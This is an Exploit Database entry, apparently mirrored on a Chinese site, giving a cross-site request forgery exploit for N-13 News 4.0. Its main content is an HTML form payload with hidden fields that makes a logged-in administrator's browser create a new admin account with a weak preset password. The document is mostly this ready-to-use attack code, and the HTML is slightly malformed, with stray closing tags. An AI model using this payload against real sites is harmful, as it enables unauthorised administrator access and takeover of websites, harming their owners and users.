N-13 News 4.0 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 18 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2011-03-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16931/

• N-13 News 4.0 CSRF Vulnerability (Add Admin)
  ====================================================================
  
  ####################################################################
  .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
  .:. Script : http://n-13news.googlecode.com/files/n13news4.0.1.zip
  .:. Tested On Demo : http://network-13.com/news/
  .:. Home : http://www.sec-risk.com/vb/
  ####################################################################
  
  ===[ Exploit ]===
  
  <form method="POST" name="form0" action="http://localhost/N-13 News 4.0/admin.php?action=options&mod=accounts&create=new">
  <input type="hidden" name="accountname" value="WebAdmin"/>
  <input type="hidden" name="accountemail" value="Example@hotmail.com"/>
  <input type="hidden" name="accountpassword1" value="123456"/>
  <input type="hidden" name="accountpassword2" value="123456"/>
  <input type="hidden" name="accountaccesslevel" value="1"/>
  <input type="hidden" name="S1" value="Save"/>
  </form>
  <form method="GET" name="form1" action="http://localhost/N-13 News 4.0/js/main.php">
  <input type="hidden" name="name" value="value"/> 
  </form>
  
  </body>
  </html>
  ####################################################################